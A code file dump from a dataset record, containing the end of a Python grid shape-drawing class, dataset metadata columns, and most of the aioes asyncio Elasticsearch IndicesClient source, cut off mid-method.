bottom_side = round(spacing_height + size[1] + pointsWH[1][0])
top_side = round(spacing_height + pointsWH[1][0])
if i >= top_side and i <= bottom_side:
for j, value in enumerate(array):
spacing_width = round(((pointsWH[0][1] - pointsWH[0][0]) / 2) - (size[0] / 2))
right_side = round(spacing_width + size[0] + pointsWH[0][0])
left_side = round(spacing_width + pointsWH[0][0])
x_side_left = round((left_side + (size[0] / 2)) - x)
x_side_right = round((left_side + (size[0] / 2)) + x)
if j >= left_side and j <= right_side and j >= x_side_left and j <= x_side_right:
grid[i][j] = '1'
x += 1
return grid
def triangle_down(self, grid, size, pointsWH):
x = 1
for i, array in enumerate(grid):
spacing_height = round(((pointsWH[1][1] - pointsWH[1][0]) / 2) - (size[1] / 2))
bottom_side = round(spacing_height + size[1] + pointsWH[1][0])
top_side = round(spacing_height + pointsWH[1][0])
if i >= top_side and i <= bottom_side:
for j, value in enumerate(array):
spacing_width = round(((pointsWH[0][1] - pointsWH[0][0]) / 2) - (size[0] / 2))
right_side = round(spacing_width + size[0] + pointsWH[0][0])
left_side = round(spacing_width + pointsWH[0][0])
x_side_left = round(left_side + x)
x_side_right = round(right_side - x)
if j >= left_side and j <= right_side and j >= x_side_left and j <= x_side_right:
grid[i][j] = '1'
x += 1
return grid
def rectangle(self, grid, size, pointsWH):
for i, array in enumerate(grid):
spacing_height = round(((pointsWH[1][1] - pointsWH[1][0]) / 2) - (size[1] / 2))
bottom_side = round(spacing_height + size[1] + pointsWH[1][0])
top_side = round(spacing_height + pointsWH[1][0])
if i >= top_side and i <= bottom_side:
for j, value in enumerate(array):
spacing_width = round(((pointsWH[0][1] - pointsWH[0][0]) / 2) - (size[0] / 2))
right_side = round(spacing_width + size[0] + pointsWH[0][0])
left_side = round(spacing_width + pointsWH[0][0])
if j >= left_side and j <= right_side:
grid[i][j] = '1'
return grid
def main():
pass
| 41.035294
| 86
| 0.608658
| 567
| 3,488
| 3.567901
| 0.081129
| 0.071181
| 0.126545
| 0.0435
| 0.903114
| 0.886802
| 0.886802
| 0.886802
| 0.875927
| 0.85566
| 0
| 0.044771
| 0.21875
| 3,488
| 85
| 87
| 41.035294
| 0.697615
| 0
| 0
| 0.772152
| 0
| 0
| 0.001146
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075949
| false
| 0.012658
| 0.037975
| 0
| 0.177215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3c0f60de3ee6d2a07aa66810c5957d07b470442
| 50,979
|
py
|
Python
|
aioes/client/indices.py
|
DLizogub/aioes
|
51658066f35699e871c8ba02e133b725043dcb84
|
[
"Apache-2.0"
] | null | null | null |
aioes/client/indices.py
|
DLizogub/aioes
|
51658066f35699e871c8ba02e133b725043dcb84
|
[
"Apache-2.0"
] | null | null | null |
aioes/client/indices.py
|
DLizogub/aioes
|
51658066f35699e871c8ba02e133b725043dcb84
|
[
"Apache-2.0"
] | 1
|
2017-03-02T12:41:16.000Z
|
2017-03-02T12:41:16.000Z
|
import asyncio
from .utils import NamespacedClient
from .utils import _make_path
from aioes.exception import NotFoundError
default = object()
class IndicesClient(NamespacedClient):
@asyncio.coroutine
def analyze(self, index=None, body=None, *,
analyzer=default, char_filters=default, field=default,
filters=default, prefer_local=default, text=default,
tokenizer=default, token_filters=default):
"""Run analyze tool.
Perform the analysis process on a text and return the tokens
breakdown of the text.
"""
params = {}
if analyzer is not default:
params['analyzer'] = analyzer
if char_filters is not default:
params['char_filters'] = char_filters
if field is not default:
params['field'] = field
if filters is not default:
params['filters'] = filters
if prefer_local is not default:
params['prefer_local'] = prefer_local
if text is not default:
params['text'] = text
if tokenizer is not default:
params['tokenizer'] = tokenizer
if token_filters is not default:
params['token_filters'] = token_filters
_, data = yield from self.transport.perform_request(
'GET',
_make_path(index, '_analyze'),
params=params, body=body)
return data
@asyncio.coroutine
def refresh(self, index=None, *,
allow_no_indices=default, expand_wildcards=default,
ignore_indices=default, ignore_unavailable=default,
force=default):
"""Refresh index.
Explicitly refresh one or more index, making all operations performed
since the last refresh available for search.
"""
params = {}
if force is not default:
params['force'] = bool(force)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST',
_make_path(index, '_refresh'),
params=params)
return data
@asyncio.coroutine
def flush(self, index=None, *,
force=default, full=default, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default):
"""Explicitly flush one or more indices."""
params = {}
if force is not default:
params['force'] = bool(force)
if full is not default:
params['full'] = bool(full)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST',
_make_path(index, '_flush'),
params=params)
return data
@asyncio.coroutine
def create(self, index, body=None, *, timeout=default,
master_timeout=default):
"""Create an index in Elasticsearch."""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'PUT',
_make_path(index),
params=params,
body=body)
return data
@asyncio.coroutine
def open(self, index, *, timeout=default, master_timeout=default,
allow_no_indices=default, expand_wildcards=default,
ignore_unavailable=default):
"""Open a closed index to make it available for search."""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST',
_make_path(index, '_open'),
params=params)
return data
@asyncio.coroutine
def close(self, index, *, allow_no_indices=default,
expand_wildcards=default, ignore_unavailable=default,
master_timeout=default, timeout=default):
"""Close index.
Close an index to remove it's overhead from the cluster. Closed index
is blocked for read/write operations.
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST',
_make_path(index, '_close'),
params=params)
return data
@asyncio.coroutine
def delete(self, index, *,
timeout=default, master_timeout=default):
"""Delete an index in Elasticsearch."""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'DELETE',
_make_path(index),
params=params)
return data
@asyncio.coroutine
def exists(self, index, *,
allow_no_indices=default, expand_wildcards=default,
ignore_unavailable=default, local=default):
"""Return a boolean indicating whether given index exists."""
params = {}
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if local is not default:
params['local'] = bool(local)
try:
yield from self.transport.perform_request(
'HEAD', _make_path(index), params=params)
except NotFoundError:
return False
return True
@asyncio.coroutine
def exists_type(self, index, doc_type, *,
allow_no_indices=default, expand_wildcards=default,
ignore_indices=default, ignore_unavailable=default,
local=default):
"""Check if a type/types exists in an index/indices."""
params = {}
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if local is not default:
params['local'] = bool(local)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
try:
yield from self.transport.perform_request(
'HEAD', _make_path(index, doc_type), params=params)
except NotFoundError:
return False
return True
@asyncio.coroutine
def put_mapping(self, index, doc_type, body, *,
allow_no_indices=default, expand_wildcards=default,
ignore_conflicts=default, ignore_unavailable=default,
master_timeout=default, timeout=default):
"""Register specific mapping definition for a specific type."""
params = {}
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if ignore_conflicts is not default:
params['ignore_conflicts'] = bool(ignore_conflicts)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if master_timeout is not default:
params['master_timeout'] = master_timeout
if timeout is not default:
params['timeout'] = timeout
_, data = yield from self.transport.perform_request(
'PUT', _make_path(index, '_mapping', doc_type),
params=params, body=body)
return data
@asyncio.coroutine
def get_mapping(self, index, doc_type=None, *,
ignore_unavailable=default, allow_no_indices=default,
expand_wildcards=default, local=default):
"""Retrieve mapping definition of index or index/type."""
params = {}
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if local is not default:
params['local'] = bool(local)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_mapping', doc_type),
params=params
)
return data
@asyncio.coroutine
def delete_mapping(self, index, doc_type, *,
master_timeout=default):
"""Delete a mapping (type) along with its data."""
params = {}
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'DELETE', _make_path(index, '_mapping', doc_type),
params=params
)
return data
@asyncio.coroutine
def get_field_mapping(self, field, index=None, doc_type=None, *,
include_defaults=default, ignore_unavailable=default,
allow_no_indices=default, expand_wildcards=default,
local=default):
"""
Retrieve mapping definition of a specific field.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-get-field-mapping.html>`_
:arg index: A comma-separated list of index names; use `_all` or empty
string for all indices
:arg doc_type: A comma-separated list of document types
:arg field: A comma-separated list of fields to retrieve the
mapping for
:arg include_defaults: A boolean indicating whether to return
default values
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes
`_all` string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both.
:arg ignore_unavailable: Whether specified concrete indices should
be ignored when unavailable (missing or closed)
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if include_defaults is not default:
params['include_defaults'] = bool(include_defaults)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if local is not default:
params['local'] = bool(local)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_mapping', doc_type, 'field', field),
params=params
)
return data
@asyncio.coroutine
def put_alias(self, name, index=None, body=None, *,
timeout=default, master_timeout=default):
"""
Create an alias for a specific index/indices.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg index: A comma-separated list of index names the alias should
point to (supports wildcards); use `_all` or omit to perform the
operation on all indices.
:arg name: The name of the alias to be created or updated
:arg body: The settings for the alias, such as `routing` or `filter`
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit timestamp for the document
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'PUT', _make_path(index, '_alias', name),
params=params, body=body
)
return data
@asyncio.coroutine
def exists_alias(self, name, index=None, *, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, local=default):
"""
Return a boolean indicating whether given alias exists.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg name: A comma-separated list of alias names to return
:arg index: A comma-separated list of index names to filter aliases
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes
`_all` string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression
to concrete indices that are open, closed or both.
:arg ignore_indices: When performed on multiple indices, allows to
ignore `missing` ones (default: none)
:arg ignore_unavailable: Whether specified concrete indices should
be ignored when unavailable (missing or closed)
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = bool(ignore_indices)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if local is not default:
params['local'] = bool(local)
try:
yield from self.transport.perform_request(
'HEAD', _make_path(index, '_alias', name),
params=params
)
except NotFoundError:
return False
return True
@asyncio.coroutine
def get_alias(self, index=None, name=None, *, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, local=default):
"""
Retrieve a specified alias.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg name: A comma-separated list of alias names to return
:arg index: A comma-separated list of index names to filter aliases
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes
`_all` string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression
to concrete indices that are open, closed or both.
:arg ignore_indices: When performed on multiple indices, allows to
ignore `missing` ones, default u'none'
:arg ignore_unavailable: Whether specified concrete indices should
be ignored when unavailable (missing or closed)
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = bool(ignore_indices)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if local is not default:
params['local'] = bool(local)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_alias', name),
params=params
)
return data
@asyncio.coroutine
def get_aliases(self, index=None, name=None, *, local=default,
timeout=default):
"""
Retrieve specified aliases
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg index: A comma-separated list of index names to filter aliases
:arg name: A comma-separated list of alias names to filter
:arg local: Return local information, do not retrieve the state from
master node (default: false)
:arg timeout: Explicit operation timeout
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if local is not default:
params['local'] = bool(local)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_aliases', name),
params=params
)
return data
@asyncio.coroutine
def update_aliases(self, body, *, timeout=default,
master_timeout=default):
"""
Update specified aliases.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg body: The definition of `actions` to perform
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Request timeout
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = bool(master_timeout)
_, data = yield from self.transport.perform_request(
'POST', '/_aliases',
params=params, body=body
)
return data
@asyncio.coroutine
def delete_alias(self, index, name, *, timeout=default,
master_timeout=default):
"""
Delete specific alias.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg index: A comma-separated list of index names (supports wildcards);
use `_all` for all indices
:arg name: A comma-separated list of aliases to delete (supports
wildcards); use `_all` to delete all aliases for the
specified indices.
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit timestamp for the document
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = bool(master_timeout)
_, data = yield from self.transport.perform_request(
'DELETE', _make_path(index, '_alias', name),
params=params
)
return data
@asyncio.coroutine
def put_template(self, name, body, *, create=default, order=default,
timeout=default, master_timeout=default,
flat_settings=default):
"""
Create an index template that will automatically be applied to new
indices created.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-templates.html>`_
:arg name: The name of the template
:arg body: The template definition
:arg create: Whether the index template should only be added if new or
can also replace an existing one
:arg order: The order for this template when merging multiple matching
ones (higher numbers are merged later, overriding the
lower numbers)
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
:arg flat_settings: Return settings in flat format (default: false)
"""
params = {}
if create is not default:
params['create'] = create
if order is not default:
params['order'] = order
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
if flat_settings is not default:
params['flat_settings'] = bool(flat_settings)
_, data = yield from self.transport.perform_request(
'PUT', _make_path('_template', name),
params=params, body=body
)
return data
@asyncio.coroutine
def exists_template(self, name, *, local=default):
"""
Return a boolean indicating whether given template exists.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-templates.html>`_
:arg name: The name of the template
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if local is not default:
params['local'] = bool(local)
try:
yield from self.transport.perform_request(
'HEAD', _make_path('_template', name),
params=params
)
except NotFoundError:
return False
return True
@asyncio.coroutine
def get_template(self, name=None, *, flat_settings=default,
local=default):
"""
Retrieve an index template by its name.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-templates.html>`_
:arg name: The name of the template
:arg flat_settings: Return settings in flat format (default: false)
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if local is not default:
params['local'] = bool(local)
if flat_settings is not default:
params['flat_settings'] = bool(flat_settings)
_, data = yield from self.transport.perform_request(
'GET', _make_path('_template', name),
params=params
)
return data
@asyncio.coroutine
def delete_template(self, name, *, timeout=default,
master_timeout=default):
"""
Delete an index template by its name.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-templates.html>`_
:arg name: The name of the template
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'DELETE', _make_path('_template', name),
params=params
)
return data
@asyncio.coroutine
def get_settings(self, index=None, name=None, *,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, flat_settings=default,
local=default):
"""Retrieve settings for one or more (or all) indices."""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = str(ignore_indices)
if flat_settings is not default:
params['flat_settings'] = bool(flat_settings)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if local is not default:
params['local'] = bool(local)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_settings', name),
params=params)
return data
@asyncio.coroutine
def put_settings(self, body, index=None, *,
allow_no_indices=default, expand_wildcards=default,
flat_settings=default, ignore_unavailable=default,
master_timeout=default):
"""Change specific index level settings in real time."""
params = {}
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if flat_settings is not default:
params['flat_settings'] = bool(flat_settings)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'PUT', _make_path(index, '_settings'),
params=params, body=body)
return data
@asyncio.coroutine
def put_warmer(self, name, body, index=None, doc_type=None, *,
allow_no_indices=default, expand_wildcards=default,
ignore_unavailable=default, master_timeout=default):
"""
Create an index warmer to run registered search requests to warm up the
index before it is available for search.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-warmers.html>`_
:arg name: The name of the warmer
:arg body: The search request definition for the warmer
(query, filters, facets, sorting, etc)
:arg index: A comma-separated list of index names to register
the warmer for; use `_all` or omit to perform the operation
on all indices
:arg doc_type: A comma-separated list of document types to register the
warmer for; leave empty to perform the operation on all types
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices in the search request
to warm. (This includes `_all` string or when no indices have been
specified)
:arg expand_wildcards: Whether to expand wildcard expression
to concrete indices that are open, closed or both, in the
search request to warm., default u'open'
:arg ignore_unavailable: Whether specified concrete indices should be
ignored when unavailable (missing or closed) in the search request
to warm
:arg master_timeout: Specify timeout for connection to master
"""
params = {}
if master_timeout is not default:
params['master_timeout'] = master_timeout
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if doc_type and not index:
index = '_all'
_, data = yield from self.transport.perform_request(
'PUT', _make_path(index, doc_type, '_warmer', name),
params=params, body=body
)
return data
@asyncio.coroutine
def get_warmer(self, index=None, doc_type=None, name=None, *,
allow_no_indices=default, expand_wildcards=default,
ignore_unavailable=default, local=default):
"""
Retreieve an index warmer.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-warmers.html>`_
:arg index: A comma-separated list of index names to restrict the
operation; use `_all` to perform the operation on all indices
:arg doc_type: A comma-separated list of document types to restrict the
operation; leave empty to perform the operation on all types
:arg name: The name of the warmer (supports wildcards); leave empty to
get all warmers
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression
to concrete indices that are open, closed or both. default u'open'
:arg ignore_unavailable: Whether specified concrete indices should be
ignored when unavailable (missing or closed)
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if local is not default:
params['local'] = bool(local)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, doc_type, '_warmer', name),
params=params
)
return data
@asyncio.coroutine
def delete_warmer(self, index, name, *, master_timeout=default):
"""
Delete an index warmer.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-warmers.html>`_
:arg index: A comma-separated list of index names to delete
warmers from (supports wildcards); use `_all` to perform
the operation on all indices.
:arg name: A comma-separated list of warmer names to delete (supports
wildcards); use `_all` to delete all warmers in the
specified indices.
:arg master_timeout: Specify timeout for connection to master
"""
params = {}
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'DELETE', _make_path(index, '_warmer', name),
params=params
)
return data
@asyncio.coroutine
def snapshot_index(self, index=None, *, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default):
"""
Explicitly perform a snapshot through the gateway of one or more
indices (backup them).
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-gateway-snapshot.html>`_
:arg index: A comma-separated list of index names; use `_all` or empty
string for all indices
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes
`_all` string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression
to concrete indices that are open, closed or both.
:arg ignore_indices: When performed on multiple indices, allows to
ignore `missing` ones (default: none)
:arg ignore_unavailable: Whether specified concrete indices should
be ignored when unavailable (missing or closed)
"""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = bool(ignore_unavailable)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
_, data = yield from self.transport.perform_request(
'POST',
_make_path(index, '_gateway', 'snapshot'), params=params
)
return data
@asyncio.coroutine
def status(self, index=None, *,
allow_no_indices=default, expand_wildcards=default,
ignore_indices=default, ignore_unavailable=default,
operation_threading=default, recovery=default, snapshot=default,
human=default):
"""Get a comprehensive status information of one or more indices."""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if recovery is not default:
params['recovery'] = bool(recovery)
if snapshot is not default:
params['snapshot'] = bool(snapshot)
if operation_threading is not default:
params['operation_threading'] = operation_threading
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if human is not default:
params['human'] = bool(human)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_status'),
params=params)
return data
@asyncio.coroutine
def stats(self, index=None, *, metric=default,
completion_fields=default, docs=default,
fielddata_fields=default, fields=default,
groups=default, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, human=default, level=default,
types=default):
"""Retrieve statistics on operations happening on an index."""
params = {}
if completion_fields is not default:
params['completion_fields'] = completion_fields
if docs is not default:
params['docs'] = docs
if types is not default:
params['types'] = types
if fielddata_fields is not default:
params['fielddata_fields'] = fielddata_fields
if fields is not default:
params['fields'] = fields
if groups is not default:
params['groups'] = groups
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if human is not default:
params['human'] = bool(human)
if level is not default:
if not isinstance(level, str):
raise TypeError("'level' parameter is not a string")
elif level.lower() in ('cluster', 'indices', 'shards'):
params['level'] = level.lower()
else:
raise ValueError("'level' parameter should be one"
" of 'cluster', 'indices', 'shards'")
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if metric is not default:
if not isinstance(metric, str):
raise TypeError("'metric' parameter is not a string")
elif metric.lower() in ('_all', 'completion', 'docs', 'fielddata',
'filter_cache', 'flush', 'get', 'id_cache',
'indexing', 'merge', 'percolate',
'refresh', 'search', 'segments', 'store',
'warmer'):
params['metric'] = metric.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of '_all', 'completion', 'docs', "
"'fielddata', 'filter_cache', 'flush', "
"'get', 'id_cache', 'indexing', 'merge', "
"'percolate', 'refresh', 'search', "
"'segments', 'store', 'warmer'")
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_stats', metric),
params=params)
return data
@asyncio.coroutine
def segments(self, index=None, *,
allow_no_indices=default, expand_wildcards=default,
ignore_indices=default, ignore_unavailable=default,
human=default):
"""Get segments information.
Provide low level segments information that a Lucene index (shard
level) is built with.
"""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if human is not default:
params['human'] = bool(human)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_segments'), params=params)
return data
@asyncio.coroutine
def optimize(self, index=None, *,
flush=default, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, max_num_segments=default,
only_expunge_deletes=default, operation_threading=default,
